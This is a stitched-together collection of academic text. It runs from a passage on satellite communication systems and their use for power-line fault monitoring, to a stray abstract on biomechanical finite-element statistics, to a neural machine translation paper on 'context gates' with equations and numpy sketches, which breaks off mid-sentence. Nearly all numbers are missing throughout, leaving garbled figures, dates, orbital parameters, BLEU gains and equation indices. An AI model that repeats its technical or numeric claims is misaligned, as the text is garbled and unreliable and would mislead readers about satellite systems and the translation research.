technology with a bandwidth of mhz can form hundreds of spot beams. the signal transmission loss is small and the communication quality can be effectively guaranteed. at the same time, it uses communication satellite frequency multiplexing technology and a large-scale expandable antenna on board, which greatly improves the sensitivity of satellite receiving signals and increases the capacity of satellite communications. the area covered by the star of tiantong no. is mainly china and its surroundings, the middle east, africa and other related regions, and most of the pacific ocean and the indian ocean. there are no restrictions on the coverage of the terrain, and the ocean, mountains, shangyuan, forests, gobi, and desert can be seamlessly covered. covers all types of mobile users including vehicles, airplanes, ships, and individuals. it provides all-weather, all-day, stable and reliable mobile communication services for various fields such as personal communications, marine transportation, ocean fishing, aviation rescue, and tourism research. when natural disasters occur in voice, short message and data services, the emergency communication capabilities of tiantong one can play a great role. in addition, the main advantages of tiantong one are reflected in the miniaturization and mobile phone of the terminal, which is easy to carry. the ground service of tiantong no. is operated by china telecom corporation, which will form a mobile communication network with ground mobile communication systems, and provide voice and data communication coverage for various handheld and small mobile terminals in china's land and surrounding sea areas. 
it is understood that china telecom has launched an operation and plans to launch a mobile phone with mobile satellite communication capabilities. even if it reaches the end of the earth, you can use it to talk to family and friends, send text messages, chat on wechat, and communicate with video. figure . tiantong- satellite mobile communication system international journal of advanced network, monitoring and controls volume , no. , it is estimated that by , china ’s mobile communication satellite system will have more than million end users, and its services will cover disaster relief, personal communications, marine transportation, ocean fishing, air passenger transport, bipolar scientific research, and international peacekeeping. during this period, we will also launch multiple tiantong- satellites to further increase the satellite mobile communication service capacity and coverage area, and expand from the surrounding areas of china to form a regional mobile communication system integrating satellite and ground integration to achieve satellite mobile communication. large-scale application and operation build an important support platform for the country's 'belt and road' strategy. ) iridium satellite . the iridium satellite system was the first leo satellite cellular system with global coverage. it was launched by motorola in the late s and developed in the early s. the "iridium" star system includes space segment, ground segment and user segment[ ]. the networking and coverage are shown in figure . space segment the initial design of the constellation consisted of leo satellites, evenly distributed in polar orbits, and all satellites were moving in the same direction. it is similar to the electrons of iridium orbiting the nucleus, hence the name of the system. the actual constellation consists of satellites distributed on circular near-polar orbital planes with an inclination of . °, with an interval of ° and an orbital height of km. each satellite provides spot beams, forming cells on the ground. at a small elevation angle of . °, the diameter of each cell is km, and the coverage area of each satellite is approximately km. the constellation forms seamless cellular coverage on the global ground. one spot beam of each satellite supports channels, a single satellite can provide channels. it was officially operated on november , . at present, it has more than . million users and uses low-orbit satellites to cover the world. the characteristics are low orbit, fast transmission speed, small information loss, and greatly improved communication quality. the ground receiving station, equipment is miniaturized, and it is interconnected with the ground network, which makes the communication in the uninhabited, barren land, remote areas with backward communication, and the scene of natural disasters unobstructed. figure . iridium satellite system international journal of advanced network, monitoring and controls volume , no. , ) high throughput satellite the "practice no. 
" satellite first applied ka-band broadband technology to china's communication satellites, with a total communication capacity of gbps, exceeding the total capacity of communication satellites developed and launched in china, marking that china's satellite communications has entered a high-throughput era at the same time, the "thirteenth practice" satellite carried out the first international two-way laser communication test between high-orbit satellites and the ground, with a speed of up to gbps, which established china's global leading position in the field of high-speed space information transmission. the "thirteenth" satellite is china's first electric propulsion satellite. compared with conventional chemical propulsion satellites, its launch weight is greatly reduced, which reduces the requirements for the carrying capacity of the launch vehicle. the amount of data will no longer be a constraint on the life of the satellite, and the design life of the communication satellite will generally exceed the current -year limit and reach to years. the "practice no. " satellite will mainly provide services for users in china and other regions. it can realize the access of mobile communication base stations in remote areas and be used in the fields of enterprise private networks, distance education, medical treatment, digital news gathering and emergency communications. at the same time, the star can facilitate users to quickly access the network, download and return rates up to mbps and mbps, which can effectively meet the needs of passengers on the high-speed vehicles such as aircraft, high-speed rail to access the internet anytime, anywhere. high-throughput satellites are an important part of satellite communications and broadcasting systems in china's integrated space-ground information network. they are an effective complement to terrestrial communication systems and can be widely used in areas where terrestrial communication systems are difficult to cover or where construction costs are high. after the completion of the “global coverage, on-demand access, on-demand services, safe and trustworthy” integrated information network in the world, china will have global space-time continuous communication, highly reliable and secure communication, regional large-capacity communication, and high-mobility full-range information transmission. and other capabilities to meet national strategic needs such as expanding national interests, safeguarding national security, safeguarding national economy and people's livelihood, and promoting economic development. in view of the strategic significance of high-throughput satellites in the space and information fields, china will continue to deploy ultra-high-capacity high-throughput satellites. it is expected that by , it will form a communication capacity that can cover the entire territory of china and the asia-pacific region with a capacity of nearly gbps. to meet the urgent needs for broadband communications in the construction work of "broadband china" and the country's "belt and road", the relevant industrial chain is expected to usher in rapid development. ) 'hongyan' project construction goal: "communicate and connect everything, the world will never lose touch" it is planned to invest billion yuan in low-orbit satellites. the first test star was launched on december , . the backbone constellation system is expected to be built in . 
its satellite data exchange function can provide two-way, real-time data transmission worldwide, as well as multimedia data services such as short messages, pictures, audio, and video. after the system is completed, services such as intelligent terminal communications, internet of things, mobile broadcasting, navigation enhancement, aviation and maritime surveillance, and broadband internet access will be launched. the system has a international journal of advanced network, monitoring and controls volume , no. , global real-time communication capability under all-weather and full-time terrain conditions. ) 'hongyun' project china aerospace science and industry plans to launch satellites. the satellites will be networked in orbits , kilometers above the ground to build a space-borne broadband global mobile internet network. the first test star was launched on december , . the entire hongyun project is divided into three phases. the first phase is to launch the first star at the end of ; the second phase is to launch four business test stars at the end of the "thirteenth five-year plan", or before the end of ; the third stage is to "ten in the middle of the th five-year plan period, around , satellites will be launched, and the construction of the heaven-earth integration system will be completed initially, with full operating conditions. after the entire plan is completed, it will realize internet access at anytime, anywhere, on the “belt and road” and even globally, and achieve a high-speed, high-quality internet / iot application experience. ) oneweb of united states one web plans to deploy small satellites in low-earth orbit to form an internet satellite network, enabling users around the world to connect to satellites and access g, lte, g, and wi-fi networks through small, low-cost user terminals. it is characterized by multiple satellites, interconnection with the internet, and a single ground terminal download rate of mbps. ) spacex of united states spacex starlink: , low-earth orbit satellites not exceeding kilometers in height (launch of microsat- a and microsat- b in early ) iii. application of satellite communication in the process of power transmission, transformation and distribution a. transmission fault monitoring system the transmission fault monitoring system, consisting of tower poles, sensor cluster, satellite wireless transceiver, power monitoring center, and mobile phone of the responsible person, to realize the status monitoring, information reporting, and fault early warning of the transmission line. the transmission fault monitoring system is a supplement to the online monitoring system of the entire smart grid transmission line. by using satellite technology, it provides strong support in areas that cannot be covered by existing monitoring systems. the business capability is increased to realize the visual real-time monitoring and fault early warning of various states of the transmission line without the coverage of the ground network. the monitoring of the status of important electrical devices on the tower pole, such as circuit breakers, load switches, section switches, and other switch monitoring and fault early warning on kv lines. the logic diagram of the high-level scheme of the transmission fault monitoring system is shown below: figure . the logic diagram of the high-level scheme of the transmission fault monitoring system international journal of advanced network, monitoring and controls volume , no. 
, the description of each part of the transmission fault monitoring system is as follows: satellite stu: it acts as an information transmission channel, and is particularly suitable for routine monitoring scenarios in areas without ground network coverage and disaster prevention and relief scenarios in areas without ground network coverage. power monitoring center: it is the existing monitoring center of the power system, not a newly deployed system platform, in order to save customers' capital investment budget to the greatest extent. responsible person's mobile phone: when an important failure occurs, the corresponding responsible person's personal mobile phone is notified by sms to speed up the progress of failure handling and reduce accident losses. of course, the level of important faults and the mobile phone number of the person in charge can be set before the implementation of the plan, which will not cause excessive sms business and bring unnecessary pressure on the responsible person sensor clusters: the main business capabilities realized in the entire scheme, that is, the types of transmission line status collection, depend on the configuration of the sensor clusters. b. distribution fault monitoring system transformer fault monitoring system, consisting of tower poles, sensor clusters, satellite stu, power monitoring center, and mobile phone of the responsible person, realize the status monitoring, platform docking, information reporting and fault early warning of distribution and transformation links. the power distribution fault monitoring system is a solution to the fault monitoring and early warning requirements of physical nodes in the power distribution and transformation business that need to increase communication support. conventional equipment on the ground network can partially address these needs, but cannot guarantee emergency communications during natural disasters. the terminal equipment stu used in the power distribution fault monitoring system is a combination of terrestrial network dtu, terrestrial network ttu, and satellite terminal technology, which can improve the reliability in the process of power distribution and transformation. considering the cost of satellite service, it is recommended to construct and install it in important substations and distribution stations, but not in ordinary stations. figure . the logic diagram of the high-level scheme of the distribution fault monitoring system satellite stu: it acts as an information transmission channel, and is particularly suitable for routine monitoring scenarios in areas without ground network coverage and disaster prevention and relief scenarios in areas without ground network coverage. power monitoring center: it is the existing monitoring center of the power system, not a newly deployed system platform, in order to save customers' capital investment budget to the greatest extent. responsible person's mobile phone: when an important failure occurs, the corresponding responsible person's personal mobile phone is notified by sms to speed up the progress of failure handling and reduce accident losses. of course, the level of important faults and the mobile phone number of the person in charge can be set before the implementation of the plan, international journal of advanced network, monitoring and controls volume , no. 
, which will not cause excessive sms business and bring unnecessary pressure on the responsible person the satellite mobile communication system can quickly form an emergency communication network in an emergency area without relying on the original communication network, enabling the field headquarters and the command center to quickly establish communication links, and provide a certain bandwidth transmission rate, while transmitting voice, images, and data and other information, supporting real-time transmission of multi-directional dynamic images, high-definition video conferences, etc. therefore, the use of satellite mobile communication means can realize emergency communications support for emergency rescue and disaster relief in large-scale disasters and meet the requirements of "all-weather, whole-process, all-round" emergency communications support, which is the future development trend of emergency communications. iv. conclusion in the event of a very catastrophic disaster such as a blizzard, hurricane, earthquake, mudslide, etc., public communication network facilities may be catastrophically damaged and paralyzed. at this time, the communication of the emergency report and rescue command is urgent, which is convenient for effectively monitoring the field power transmission and transformation facilities, and at the same time, it can achieve rapid and effective rescue in the event of a disaster. the monitoring program uses china’s tiantong satellite with independent intellectual property rights to establish a remote monitoring system for power transmission and transformation facilities based on the internet of things of satellites. this system has high security and anti-interference, and can effectively solve remote monitoring of the wild environment. , data communication, positioning and other problems, to facilitate better operation and maintenance of power transmission and transformation facilities, reduce the failure rate of facilities, improve accident repair capacity, rescue timeliness and power supply reliability. references [ ] lv ziping, liang peng, chen zhengjun. development status and trends of satellite mobile communications[j]. satellite application, ( ): - . [ ] liu yue. review on the development of geo mobile communication satellite technology[j]. international space, ( ): - . [ ] xu feng, chen peng. development progress and trends of foreign satellite mobile communications[j]. telecommunication engineering, , ( ): - . [ ] he shanbao. inmarsat system and its new development[j].space international, ( ): - . [ ] andrew d s, paul s. utilizing the globalstar network for satellite communications in low earth orbit[c]. th aiaa aerospace sciences meeting, : - . [ ] huang huashan. application and development of satellite mobile communication[j].china high-tech enterprises, ( ): - . [ ] ma chong, zuo peng, wang zhen-hua. inmarsat system and its application in emergency[j]. satellite application, ( ): - . [ ] zhu lidong. review on development and new technologies of military satellite communications aboard[j].radio communications technology, , ( ): - . [ ] lv ziping, zhang gengxin, liang peng. the development and orientation of china’s geo and leo mobile satellite communications[j].digital communication world, ( ): - . [ ] xiao longlong, liang xiaojuan, li xin. the development and application of satellite mobile communication system. 
probabilistic biomechanical finite element simulations: whole-model classical hypothesis testing based on upcrossing geometry. t. pataky, m. koseki and p. g. cox. peerj comput. sci. doi: . /peerj-cs. abstract: statistical analyses of biomechanical finite element (fe) simulations are frequently conducted on scalar metrics extracted from anatomically homologous regions, like maximum von mises stresses from demarcated bone areas. the advantages of this approach are numerical tabulability and statistical simplicity, but disadvantages include region demarcation subjectivity, spatial resolution reduction, and results interpretation complexity when attempting to mentally map tabulated results to original…
context gates for neural machine translation. zhaopeng tu† yang liu‡ zhengdong lu† xiaohua liu† hang li† †noah's ark lab, huawei technologies, hong kong {tu.zhaopeng,lu.zhengdong,liuxiaohua ,hangli.hl}@huawei.com ‡department of computer science and technology, tsinghua university, beijing liuyang @tsinghua.edu.cn abstract: in neural machine translation (nmt), generation of a target word depends on both source and target contexts. we find that source contexts have a direct impact on the adequacy of a translation while target contexts affect the fluency. intuitively, generation of a content word should rely more on the source context and generation of a functional word should rely more on the target context. due to the lack of effective control over the influence from source and target contexts, conventional nmt tends to yield fluent but inadequate translations. to address this problem, we propose context gates which dynamically control the ratios at which source and target contexts contribute to the generation of target words. in this way, we can enhance both the adequacy and fluency of nmt with more careful control of the information flow from contexts. experiments show that our approach significantly improves upon a standard attention-based nmt system by + . bleu points.
introduction neural machine translation (nmt) (kalchbrenner and blunsom, ; sutskever et al., ; bahdanau et al., ) has made significant progress in the past several years. its goal is to construct and utilize a single large neural network to accomplish the entire translation task. one great advantage of nmt is that the translation system can be completely constructed by learning from data without human involvement (cf., feature engineering in statistical machine translation (smt)). the encoder-decoder architecture is widely employed (cho et al., ; sutskever et al., ), in which the encoder summarizes the source sentence into a vector representation, and the decoder generates the target sentence word-by-word from the vector representation. the representation of the source sentence and the representation of the partially generated target sentence (translation) at each position are referred to as source context and target context, respectively. the generation of a target word is determined jointly by the source context and target context.
table : source and target contexts are highly correlated to translation adequacy and fluency, respectively. src and tgt denote halving the contributions from the source and target contexts when generating the translation, respectively.
input: jı̄nnián qián liǎng yuè guǎngdōng gāoxı̄n jı̀shù chǎnpı̌n chūkǒu . yı̀ měiyuán
nmt: in the first two months of this year , the export of new high level technology product was unk - billion us dollars
src (halved): china 's guangdong hi - tech exports hit billion dollars
tgt (halved): china 's export of high and new hi - tech exports of the export of the export of the export of the export of the export of the export of the export of the export of · · ·
several techniques in nmt have proven to be very effective, including gating (hochreiter and schmidhuber, ; cho et al., ) and attention (bahdanau et al., ), which can model long-distance dependencies and complicated alignment relations in the translation process. using an encoder-decoder framework that incorporates gating and attention techniques, it has been reported that the performance of nmt can surpass the performance of traditional smt as measured by bleu score (luong et al., ). despite this success, we observe that nmt usually yields fluent but inadequate translations. we attribute this to a stronger influence of target context on generation, which results from a stronger language model than that used in smt. one question naturally arises: what will happen if we change the ratio of influences from the source or target contexts? table shows an example in which an attention-based nmt system (bahdanau et al., ) generates a fluent yet inadequate translation (e.g., missing the translation of "guǎngdōng"). when we halve the contribution from the source context, the result further loses its adequacy by missing the partial translation "in the first two months of this year". one possible explanation is that the target context takes a higher weight and thus the system favors a shorter translation.
in contrast, when we halve the contribution from the target context, the result completely loses its fluency by repeatedly generating the translation of "chūkǒu" (i.e., "the export of") until the generated translation reaches the maximum length. therefore, this example indicates that source and target contexts in nmt are highly correlated to translation adequacy and fluency, respectively. in fact, conventional nmt lacks effective control on the influence of source and target contexts. at each decoding step, nmt treats the source and target contexts equally, and thus ignores the different needs of the contexts. for example, content words in the target sentence are more related to the translation adequacy, and thus should depend more on the source context. in contrast, function words in the target sentence are often more related to the translation fluency (e.g., "of" after "is fond"), and thus should depend more on the target context. in this work, we propose to use context gates to control the contributions of source and target contexts on the generation of target words (decoding) in nmt. (fluency measures whether the translation is fluent, while adequacy measures whether the translation is faithful to the original sentence (snover et al., ).) context gates are non-linear gating units which can dynamically select the amount of context information in the decoding process. specifically, at each decoding step, the context gate examines both the source and target contexts, and outputs a ratio between zero and one to determine the percentages of information to utilize from the two contexts. in this way, the system can balance the adequacy and fluency of the translation with regard to the generation of a word at each position. experimental results show that introducing context gates leads to an average improvement of + . bleu points over a standard attention-based nmt system (bahdanau et al., ). an interesting finding is that we can replace the gru units in the decoder with conventional rnn units and in the meantime utilize context gates. the translation performance is comparable with the standard nmt system with gru, but the system enjoys a simpler structure (i.e., uses only a single gate and half of the parameters) and a faster decoding (i.e., requires only half the matrix computations for decoding). neural machine translation suppose that $x = x_1, \ldots, x_j, \ldots, x_J$ represents a source sentence and $y = y_1, \ldots, y_i, \ldots, y_I$ a target sentence. nmt directly models the probability of translation from the source sentence to the target sentence word by word: $p(y|x) = \prod_{i=1}^{I} p(y_i \mid y_{<i}, x)$ ( ) where $y_{<i} = y_1, \ldots, y_{i-1}$. (our code is publicly available at https://github.com/tuzhaopeng/nmt.) figure : architecture of decoder rnn. as shown in figure , the probability of generating the i-th word $y_i$ is computed by using a recurrent neural network (rnn) in the decoder: $p(y_i \mid y_{<i}, x) = g(y_{i-1}, t_i, s_i)$ ( ) where $g(\cdot)$ first linearly transforms its input and then applies a softmax function, $y_{i-1}$ is the previously generated word, $t_i$ is the i-th decoding hidden state, and $s_i$ is the i-th source representation. the state $t_i$ is computed as follows: $t_i = f(y_{i-1}, t_{i-1}, s_i) = f(W e(y_{i-1}) + U t_{i-1} + C s_i)$ ( ) where • $f(\cdot)$ is a function that computes the current decoding state given all the related inputs. it can be either a vanilla rnn unit using the tanh function, or a sophisticated gated rnn unit such as gru (cho et al., ) or lstm (hochreiter and schmidhuber, ). • $e(y_{i-1}) \in \mathbb{R}^m$ is an m-dimensional embedding of the previously generated word $y_{i-1}$. • $s_i$ is a vector representation extracted from the source sentence by the encoder. the encoder usually uses an rnn to encode the source sentence $x$ into a sequence of hidden states $h = h_1, \ldots, h_j, \ldots, h_J$, in which $h_j$ is the hidden state of the j-th source word $x_j$. $s_i$ can be either a static vector that summarizes the whole sentence (e.g., $s_i \equiv h_J$) (cho et al., ; sutskever et al., ), or a dynamic vector that selectively summarizes certain parts of the source sentence at each decoding step (e.g., $s_i = \sum_{j=1}^{J} \alpha_{i,j} h_j$, in which $\alpha_{i,j}$ is an alignment probability calculated by an attention model) (bahdanau et al., ). • $W \in \mathbb{R}^{n \times m}$, $U \in \mathbb{R}^{n \times n}$, $C \in \mathbb{R}^{n \times n'}$ are weight matrices, with $n$ and $n'$ being the numbers of units of the decoder hidden state and the source representation, respectively. the inputs to the decoder (i.e., $s_i$, $t_{i-1}$, and $y_{i-1}$) represent the contexts. specifically, the source representation $s_i$ stands for the source context, which embeds the information from the source sentence. the previous decoding state $t_{i-1}$ and the previously generated word $y_{i-1}$ constitute the target context.
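a minimal numpy sketch of the decoder step defined by equations ( )–( ) may help make the notation concrete; the dimensions, random weights and the single attention-free source vector are illustrative assumptions only, not the configuration used in the paper.

```python
# one decoder step: t_i = f(W e(y_{i-1}) + U t_{i-1} + C s_i) with a vanilla tanh
# unit, followed by the softmax readout g(.) over the target vocabulary.
import numpy as np

rng = np.random.default_rng(0)
m, n, n_src, vocab = 4, 6, 5, 10          # embedding, state, source dims, vocab size

W = rng.standard_normal((n, m))           # transforms the word embedding e(y_{i-1})
U = rng.standard_normal((n, n))           # transforms the previous state t_{i-1}
C = rng.standard_normal((n, n_src))       # transforms the source representation s_i
E = rng.standard_normal((vocab, m))       # embedding table e(.)
W_out = rng.standard_normal((vocab, n))   # readout used inside g(.)

def decoder_step(y_prev, t_prev, s_i):
    """one decoding step: returns the new state t_i and p(y_i | y_<i, x)."""
    t_i = np.tanh(W @ E[y_prev] + U @ t_prev + C @ s_i)   # state update, vanilla f(.)
    logits = W_out @ t_i                                   # linear part of g(.)
    probs = np.exp(logits - logits.max())
    return t_i, probs / probs.sum()                        # softmax over target words

# usage: generate a few words greedily from an arbitrary source vector
s = rng.standard_normal(n_src)            # stands in for the source context s_i
t, y = np.zeros(n), 0                     # initial state and start token
for _ in range(3):
    t, p = decoder_step(y, t, s)
    y = int(p.argmax())                   # pick the most probable next word
    print(y, round(float(p[y]), 3))
```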
. effects of source and target contexts (figure : effects of source and target contexts; (a) lengths of translations in words, (b) subjective evaluation. the pair (a, b) in the legends denotes scaling the source and target contexts with ratios a and b, respectively.) we first empirically investigate our hypothesis: whether source and target contexts correlate to translation adequacy and fluency. figure (a) shows the translation lengths with various scaling ratios (a, b) for source and target contexts: $t_i = f\big(b \otimes (W e(y_{i-1}) + U t_{i-1}) + a \otimes C s_i\big)$ (in a recent implementation of nmt (https://github.com/nyu-dl/dl mt-tutorial), $t_{i-1}$ and $y_{i-1}$ are combined together with a gru before being fed into the decoder, which can boost translation performance. we follow this practice and treat both of them as the target context.) for example, the pair ( . , . ) means fully leveraging the effect of the source context while halving the effect of the target context. reducing the effect of the target context (i.e., the lines ( . , . ) and ( . , . )) results in longer translations, while reducing the effect of the source context (i.e., the lines ( . , . ) and ( . , . )) leads to shorter translations. when halving the effect of the target context, most of the generated translations reach the maximum length, which is three times the length of the source sentence in this work. figure (b) shows the results of manual evaluation on source sentences randomly sampled from the test sets. reducing the effect of the source context (i.e., ( . , . ) and ( . , . )) leads to more fluent yet less adequate translations. on the other hand, reducing the effect of the target context (i.e., ( . , . ) and ( . , . )) is expected to yield more adequate but less fluent translations: in this setting, the source words are translated (i.e., higher adequacy) while the translations are in the wrong order (i.e., lower fluency). in practice, however, we observe the side effect that some source words are translated repeatedly until the translation reaches the maximum length (i.e., lower fluency), while others are left untranslated (i.e., lower adequacy). the reason is twofold: . nmt lacks a mechanism that guarantees that each source word is translated. the decoding state implicitly models the notion of "coverage" by recurrently reading the time-dependent source context $s_i$. lowering its contribution weakens the "coverage" effect and encourages the decoder to regenerate phrases multiple times to achieve the desired translation length. . the translation is incomplete. as shown in table , nmt can get stuck in an infinite loop, repeatedly generating a phrase due to the overwhelming influence of the source context. as a result, generation terminates early because the translation reaches the maximum length allowed by the implementation, even though the decoding procedure is not finished. (the recently proposed coverage-based technique can alleviate this problem (tu et al., ). in this work, we consider another approach, which is complementary to the coverage mechanism.) the quantitative (figure ) and qualitative (table ) results confirm our hypothesis, i.e., source and target contexts are highly correlated to translation adequacy and fluency. we believe that a mechanism that can dynamically select information from the source context and target context would be useful for nmt models, and this is exactly the approach we propose.
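the scaling experiment above can be pictured with a small sketch of the modified update $t_i = f\big(b \otimes (W e(y_{i-1}) + U t_{i-1}) + a \otimes C s_i\big)$; the dimensions and random weights below are illustrative assumptions, not the experimental settings used in the paper.

```python
# decoder update with the source contribution scaled by a and the target
# contribution scaled by b, as in the (a, b) experiment described above.
import numpy as np

rng = np.random.default_rng(1)
m, n, n_src = 4, 6, 5
W, U, C = (rng.standard_normal(s) for s in [(n, m), (n, n), (n, n_src)])

def scaled_step(emb_prev, t_prev, s_i, a=1.0, b=1.0):
    """decoder update with source context scaled by a and target context by b."""
    target_part = W @ emb_prev + U @ t_prev
    source_part = C @ s_i
    return np.tanh(b * target_part + a * source_part)

emb, t, s = rng.standard_normal(m), rng.standard_normal(n), rng.standard_normal(n_src)
full = scaled_step(emb, t, s, a=1.0, b=1.0)      # normal decoding
half_tgt = scaled_step(emb, t, s, a=1.0, b=0.5)  # halve the target context
half_src = scaled_step(emb, t, s, a=0.5, b=1.0)  # halve the source context
print(np.round(full, 2), np.round(half_tgt, 2), np.round(half_src, 2), sep="\n")
```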
context gates . architecture inspired by the success of gated units in rnns (hochreiter and schmidhuber, ; cho et al., ), we propose using context gates to dynamically control the amount of information flowing from the source and target contexts and thus balance the fluency and adequacy of nmt at each decoding step. intuitively, at each decoding step i, the context gate looks at the input signals from both the source (i.e., $s_i$) and target (i.e., $t_{i-1}$ and $y_{i-1}$) sides, and outputs a number between zero and one for each element in the input vectors, where one denotes "completely transferring this" while zero denotes "completely ignoring this". the corresponding input signals are then processed with an element-wise multiplication before being fed to the activation layer to update the decoding state. formally, a context gate consists of a sigmoid neural network layer and an element-wise multiplication operation, as illustrated in figure (figure : architecture of context gate). the context gate assigns an element-wise weight to the input signals, computed by $z_i = \sigma(W_z e(y_{i-1}) + U_z t_{i-1} + C_z s_i)$ ( ) here $\sigma(\cdot)$ is a logistic sigmoid function, and $W_z \in \mathbb{R}^{n \times m}$, $U_z \in \mathbb{R}^{n \times n}$, $C_z \in \mathbb{R}^{n \times n'}$ are the weight matrices. again, $m$, $n$ and $n'$ are the dimensions of the word embedding, the decoding state, and the source representation, respectively. note that $z_i$ has the same dimensionality as the transferred input signals (e.g., $C s_i$), and thus each element in the input vectors has its own weight. (figure : architectures of nmt with various context gates, which either scale only one side of the translation contexts (i.e., the source context in (a) and the target context in (b)) or control the effects of both sides (i.e., (c)): (a) context gate (source), (b) context gate (target), (c) context gate (both).) . integrating context gates into nmt next, we consider how to integrate context gates into an nmt model. the context gate can decide the amount of context information used in generating the next target word at each step of decoding. for example, after obtaining the partial translation ". . . new high level technology product", the gate looks at the translation contexts and decides to depend more heavily on the source context. accordingly, the gate assigns higher weights to the source context and lower weights to the target context and then feeds them into the decoding activation layer. this could correct inadequate translations, such as the missing translation of "guǎngdōng", that are due to a greater influence from the target context.
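a minimal numpy sketch of the context gate in equation ( ) is given below; the dimensions and random weights are illustrative assumptions, and the ways of combining $z_i$ with the two contexts are the integration strategies described next.

```python
# the context gate: an element-wise sigmoid gate z_i computed from the previous
# word embedding, the previous decoding state and the source representation.
import numpy as np

rng = np.random.default_rng(2)
m, n, n_src = 4, 6, 5                      # embedding, state and source dims

W_z = rng.standard_normal((n, m))          # acts on e(y_{i-1})
U_z = rng.standard_normal((n, n))          # acts on t_{i-1}
C_z = rng.standard_normal((n, n_src))      # acts on s_i

def sigmoid(x):
    return 1.0 / (1.0 + np.exp(-x))

def context_gate(emb_prev, t_prev, s_i):
    """element-wise gate z_i in [0, 1], one weight per unit of the decoding state."""
    return sigmoid(W_z @ emb_prev + U_z @ t_prev + C_z @ s_i)

emb, t, s = rng.standard_normal(m), rng.standard_normal(n), rng.standard_normal(n_src)
z = context_gate(emb, t, s)
print(np.round(z, 2))                      # n gate values between 0 and 1
```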
this could correct inade- quate translations, such as the missing translation of “guǎngdōng”, due to greater influence from the tar- get context. we have three strategies for integrating context gates into nmt that either affect one of the transla- tion contexts or both contexts, as illustrated in fig- ure . the first two strategies are inspired by out- put gates in lstms (hochreiter and schmidhuber, ), which control the amount of memory content utilized. in these kinds of models, zi only affects either source context (i.e., si) or target context (i.e., yi− and ti− ): • context gate (source) ti = f ( we(yi− ) + uti− + zi ◦csi ) • context gate (target) ti = f ( zi ◦ (we(yi− ) + uti− ) + csi ) where ◦ is an element-wise multiplication, and zi is the context gate calculated by equation . this is also essentially similar to the reset gate in the gru, which decides what information to forget from the previous decoding state before transferring that in- formation to the decoding activation layer. the dif- ference is that here the “reset” gate resets the context vector rather than the previous decoding state. the last strategy is inspired by the concept of up- date gate from gru, which takes a linear sum be- tween the previous state ti− and the candidate new state t̃i. in our case, we take a linear interpolation between source and target contexts: • context gate (both) ti = f ( ( −zi)◦ (we(yi− ) + uti− ) + zi ◦csi ) (a) gating scalar (b) context gate figure : comparison to gating scalar proposed by xu et al. ( ). related work comparison to (xu et al., ): context gates are inspired by the gating scalar model proposed by xu et al. ( ) for the image caption genera- tion task. the essential difference lies in the task requirement: • in image caption generation, the source side (i.e., image) contains more information than the target side (i.e., caption). therefore, they em- ploy a gating scalar to scale only the source context. • in machine translation, both languages should contain equivalent information. our model jointly controls the contributions from the source and target contexts. a direct interaction between input signals from both sides is useful for balancing adequacy and fluency of nmt. other differences in the architecture include: xu et al. ( ) uses a scalar that is shared by all elements in the source context, while we employ a gate with a distinct weight for each el- ement. the latter offers the gate a more precise control of the context vector, since different el- ements retain different information. we add peephole connections to the architec- ture, by which the source context controls the gate. it has been shown that peephole connec- tions make precise timings easier to learn (gers and schmidhuber, ). our context gate also considers the previously generated word yi− as input. the most re- cently generated word can help the gate to bet- ter estimate the importance of target context, especially for the generation of function words in translations that may not have a correspond- ing word in the source sentence (e.g., “of” after “is fond”). experimental results (section . ) show that these modifications consistently improve translation qual- ity. comparison to gated rnn: state-of-the-art nmt models (sutskever et al., ; bahdanau et al., ) generally employ a gated unit (e.g., gru or lstm) as the activation function in the decoder. 
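Before continuing the comparison with gated units, the three integration strategies can be summarized in one short sketch. The three formulas follow the bulleted variants above; taking tanh as the activation f reflects the vanilla decoder and is an assumption here (a GRU decoder would apply the same gating inside its candidate-state computation), and all dimensions and weights are illustrative rather than the paper's settings.

```python
import numpy as np

def gated_decoder_update(y_prev_emb, t_prev, s_i, W, U, C, z, variant="both"):
    """Decoder update under the three integration strategies described above:
      "source": t_i = f(W e(y_{i-1}) + U t_{i-1} + z o C s_i)
      "target": t_i = f(z o (W e(y_{i-1}) + U t_{i-1}) + C s_i)
      "both":   t_i = f((1 - z) o (W e(y_{i-1}) + U t_{i-1}) + z o C s_i)
    f is assumed to be tanh (the vanilla decoder)."""
    target_ctx = W @ y_prev_emb + U @ t_prev
    source_ctx = C @ s_i
    if variant == "source":
        pre = target_ctx + z * source_ctx
    elif variant == "target":
        pre = z * target_ctx + source_ctx
    elif variant == "both":
        pre = (1.0 - z) * target_ctx + z * source_ctx
    else:
        raise ValueError(variant)
    return np.tanh(pre)

# toy usage with a stand-in gate vector z in (0, 1)
m, n, n_src = 4, 6, 8
rng = np.random.default_rng(1)
W, U, C = rng.normal(size=(n, m)), rng.normal(size=(n, n)), rng.normal(size=(n, n_src))
z = 1.0 / (1.0 + np.exp(-rng.normal(size=n)))
t_i = gated_decoder_update(rng.normal(size=m), np.zeros(n), rng.normal(size=n_src),
                           W, U, C, z, variant="both")
```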
one might suspect that the context gate proposed in this work is somewhat redundant, given the existing gates that control the amount of information carried over from the previous decoding state si− (e.g., re- set gate in gru). we argue that they are in fact com- plementary: the context gate regulates the contextual information flowing into the decoding state, while the gated unit captures long-term dependencies be- tween decoding states. our experiments confirm the correctness of our hypothesis: the context gate not only improves translation quality when compared to a conventional rnn unit (e.g., an element-wise tanh), but also when compared to a gated unit of gru, as shown in section . . comparison to coverage mechanism: re- cently, tu et al. ( ) propose adding a coverage mechanism into nmt to alleviate over-translation and under-translation problems, which directly affect translation adequacy. they maintain a cov- erage vector to keep track of which source words have been translated. the coverage vector is fed to the attention model to help adjust future attention. this guides nmt to focus on the un-translated source words while avoiding repetition of source content. our approach is complementary: the cov- erage mechanism produces a better source context representation, while our context gate controls the effect of the source context based on its relative importance. experiments in section . show that combining the two methods can further improve translation performance. there is another difference as well: the coverage mechanism is only applicable to attention-based nmt models, while the context gate is applicable to all nmt models. comparison to exploiting auxiliary contexts in language modeling: a thread of work in lan- guage modeling (lm) attempts to exploit auxiliary sentence-level or document-level context in an rnn lm (mikolov and zweig, ; ji et al., ; wang and cho, ). independent of our work, wang and cho ( ) propose “early fusion” models of rnns where additional information from an inter- sentence context is “fused” with the input to the rnn. closely related to wang and cho ( ), our approach aims to dynamically control the contribu- tions of required source and target contexts for ma- chine translation, while theirs focuses on integrating auxiliary corpus-level contexts for language mod- elling to better approximate the corpus-level prob- ability. in addition, we employ a gating mechanism to produce a dynamic weight at different decoding steps to combine source and target contexts, while they do a linear combination of intra-sentence and inter-sentence contexts with static weights. exper- iments in section . show that our gating mech- anism significantly outperforms linear interpolation when combining contexts. comparison to handling null-generated words in smt: in machine translation, there are certain syntactic elements of the target language that are missing in the source 